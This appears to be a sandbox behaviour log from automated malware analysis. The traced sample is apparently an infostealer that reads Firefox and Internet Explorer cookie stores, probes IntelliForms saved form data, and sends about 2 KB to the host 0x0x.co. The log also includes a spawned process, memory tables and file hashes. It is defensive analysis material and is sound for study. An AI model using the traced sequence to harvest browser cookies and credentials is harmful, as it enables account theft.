File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-journal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes False 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = file_attributes False 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = size, size_out = 0 True 2
Module Create Mapping module_name = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 32768 True 1
Module Map C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = size, size_out = 0 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, size = 32768, size_out = 32768 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = size, size_out = 0 True 18
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm, type = file_attributes True 1
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal, type = file_attributes True 1
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-wal True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Ntdll, type = file_attributes False 1
Module Load module_name = Ntdll, base_address = 0x77230000 True 1
Module Get Address module_name = c:\windows\system32\ntdll.dll, function = RtlGetVersion, address_out = 0x772965e3 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 85 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Microsoft\Windows\INetCookies\, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\, type = file_attributes True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@ad13.adfarm1.adition[1].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@ad13.adfarm1.adition[1].txt, size = 8192, size_out = 89 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adfarm1.adition[1].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adfarm1.adition[1].txt, size = 8192, size_out = 101 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adform[1].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adform[1].txt, size = 8192, size_out = 73 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adnxs[1].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adnxs[1].txt, size = 8192, size_out = 554 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adtech[2].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@adtech[2].txt, size = 8192, size_out = 102 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@advertising[1].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@advertising[1].txt, size = 8192, size_out = 282 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@api.bing[2].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@api.bing[2].txt, size = 8192, size_out = 223 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@at.atwola[2].txt, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@at.atwola[2].txt, size = 8192, size_out = 515 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bing[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bing[1].txt, size = 8192, size_out = 264 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[1].txt, size = 8192, size_out = 112 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@bs.serving-sys[2].txt, size = 8192, size_out = 92 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.bing[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.bing[2].txt, size = 8192, size_out = 456 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.msn[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@c.msn[2].txt, size = 8192, size_out = 130 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@google[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@google[2].txt, size = 8192, size_out = 281 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@linkedin[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@linkedin[2].txt, size = 8192, size_out = 271 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@msn[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@msn[1].txt, size = 8192, size_out = 534 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@scorecardresearch[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@scorecardresearch[2].txt, size = 8192, size_out = 202 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@serving-sys[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@serving-sys[1].txt, size = 8192, size_out = 383 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@track.adform[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@track.adform[1].txt, size = 8192, size_out = 75 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.bing[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.bing[1].txt, size = 8192, size_out = 117 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.linkedin[1].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.linkedin[1].txt, size = 8192, size_out = 168 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.msn[2].txt, file_attributes = _O_RDONLY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Windows\Cookies\eebsym5@www.msn[2].txt, size = 8192, size_out = 1006 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1409, size_out = 1409 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1235, size_out = 1235 True 1
Fn
Data
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_RDONLY True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 453, size_out = 448 True 1
Fn
Data
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\ws2_32, base_address = 0x77380000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = getaddrinfo, address_out = 0x77384296 True 2
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = getnameinfo, address_out = 0x773867b7 True 1
Fn
Module Get Address module_name = c:\windows\system32\ws2_32.dll, function = freeaddrinfo, address_out = 0x77384b1b True 1
Fn
DNS Resolve Name host = 0x0x.co, address_out = 104.217.54.142, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 104.217.54.142, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 2237, size_out = 2237 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 191
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 322, size_out = 322 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 5
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
File Delete filename = c:\users\eebsym5\appdata\local\temp\mybrs.log True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, base_address = 0x1250000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = ext-ms-win-kernel32-package-current-l1-1-0, base_address = 0x0 False 2
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #7: jrsi6vakyydz.exe
183 26
Information Value
ID #7
File Name c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:31, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:12
OS Process Information
Information Value
PID 0xbf4
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xBF8, 0xC04, 0xC08, 0xC0C, 0xC10, 0xC14, 0xC18, 0xC1C, 0xC20, 0xC24, 0xC28, 0xC2C, 0xC30, 0xC80, 0xC84, 0xCB0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory r True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory rw True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002b7fff Pagefile Backed Memory r True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory rw True False False -
pagefile_0x00000000003c0000 0x003c0000 0x004c0fff Pagefile Backed Memory r True False False -
private_0x00000000004d0000 0x004d0000 0x0050ffff Private Memory rwx True False False -
pagefile_0x0000000000510000 0x00510000 0x00510fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory rw True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory - True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory - True False False -
private_0x0000000000550000 0x00550000 0x0055ffff Private Memory - True False False -
private_0x0000000000560000 0x00560000 0x0056ffff Private Memory - True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory - True False False -
private_0x0000000000580000 0x00580000 0x005bffff Private Memory rwx True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory - True False False -
pagefile_0x00000000005d0000 0x005d0000 0x005d0fff Pagefile Backed Memory rw True False False -
rpcss.dll 0x005e0000 0x0063bfff Memory Mapped File r False False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory - True False False -
l_intl.nls 0x005f0000 0x005f2fff Memory Mapped File r False False False -
pagefile_0x0000000000600000 0x00600000 0x00600fff Pagefile Backed Memory r True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory - True False False -
pagefile_0x0000000000630000 0x00630000 0x00631fff Pagefile Backed Memory r True False False -
sorttbls.nlp 0x00640000 0x00644fff Memory Mapped File r False False False -
private_0x0000000000650000 0x00650000 0x0065ffff Private Memory rw True False False -
private_0x0000000000660000 0x00660000 0x006fffff Private Memory rw True False False -
sortkey.nlp 0x00700000 0x00740fff Memory Mapped File r False False False -
pagefile_0x0000000000750000 0x00750000 0x0076ffff Pagefile Backed Memory rw True False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory - True False False -
pagefile_0x0000000000780000 0x00780000 0x00780fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000790000 0x00790000 0x00796fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x007a1fff Pagefile Backed Memory rw True False False -
private_0x00000000007b0000 0x007b0000 0x007bffff Private Memory rw True False False -
private_0x00000000007c0000 0x007c0000 0x0084ffff Private Memory rw True False False -
pagefile_0x00000000007c0000 0x007c0000 0x007d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007e0000 0x007e0000 0x007e0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007f0000 0x007f0000 0x007f0fff Pagefile Backed Memory r True False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory rw True False False -
private_0x0000000000880000 0x00880000 0x0097ffff Private Memory rw True False False -
sortdefault.nls 0x00980000 0x00c4efff Memory Mapped File r False False False -
jrsi6vakyydz.exe 0x00ca0000 0x00cdbfff Memory Mapped File rwx True True True
pagefile_0x0000000000ce0000 0x00ce0000 0x018dffff Pagefile Backed Memory r True False False -
private_0x00000000018e0000 0x018e0000 0x038dffff Private Memory rw True False False -
private_0x0000000003960000 0x03960000 0x03a5ffff Private Memory rw True False False -
private_0x0000000003a60000 0x03a60000 0x03b4ffff Private Memory rw True False False -
private_0x0000000003a60000 0x03a60000 0x03b0ffff Private Memory rw True False False -
private_0x0000000003b10000 0x03b10000 0x03b4ffff Private Memory rw True False False -
pagefile_0x0000000003b50000 0x03b50000 0x03c2efff Pagefile Backed Memory r True False False -
private_0x0000000003c70000 0x03c70000 0x03d6ffff Private Memory rw True False False -
pagefile_0x0000000003d70000 0x03d70000 0x04162fff Pagefile Backed Memory r True False False -
kernelbase.dll.mui 0x04170000 0x0422ffff Memory Mapped File rw False False False -
private_0x0000000004250000 0x04250000 0x0434ffff Private Memory rw True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory rw True False False -
private_0x00000000044a0000 0x044a0000 0x0459ffff Private Memory rw True False False -
private_0x00000000045a0000 0x045a0000 0x0468ffff Private Memory rw True False False -
private_0x0000000004690000 0x04690000 0x0478ffff Private Memory rw True False False -
private_0x0000000004790000 0x04790000 0x0488ffff Private Memory rw True False False -
private_0x0000000004930000 0x04930000 0x04a2ffff Private Memory rw True False False -
private_0x0000000004a30000 0x04a30000 0x04bbffff Private Memory rw True False False -
private_0x0000000004c00000 0x04c00000 0x04cfffff Private Memory rw True False False -
private_0x0000000004d00000 0x04d00000 0x04dfffff Private Memory rw True False False -
system.windows.forms.ni.dll 0x68aa0000 0x6967dfff Memory Mapped File rwx True False False -
system.ni.dll 0x69680000 0x69e1bfff Memory Mapped File rwx True False False -
wminet_utils.dll 0x6a310000 0x6a318fff Memory Mapped File rwx True False False -
system.management.ni.dll 0x6b280000 0x6b383fff Memory Mapped File rwx True False False -
system.xml.ni.dll 0x6b870000 0x6bda5fff Memory Mapped File rwx True False False -
system.windows.forms.dll 0x6b8e0000 0x6bdadfff Memory Mapped File rwx False False False -
system.drawing.ni.dll 0x6bdb0000 0x6bf37fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
system.configuration.ni.dll 0x6de90000 0x6df80fff Memory Mapped File rwx True False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
shfolder.dll 0x6efd0000 0x6efd4fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
rtutils.dll 0x73390000 0x7339cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
credssp.dll 0x74b20000 0x74b27fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory rw True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory rw True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 12 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe 213.50 KB MD5: 1e8073f6a1421490fc093196e4eb884e SHA1: 25b6296a419e8471ec899b8e1996fb20c5845c22 SHA256: d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05 SSDeep: 6144:q+8ZepOGuDnw9tOJavXhe9Tedm/8b1tnzwa:qjZepgDj44Iyctnx True
Threads
Thread 0xbf8
109 20
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
Mutex Create mutex_name = QSR_MUTEX_QSHCFbGIqN10lIdkUq True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 554 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.config, type = file_attributes False 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
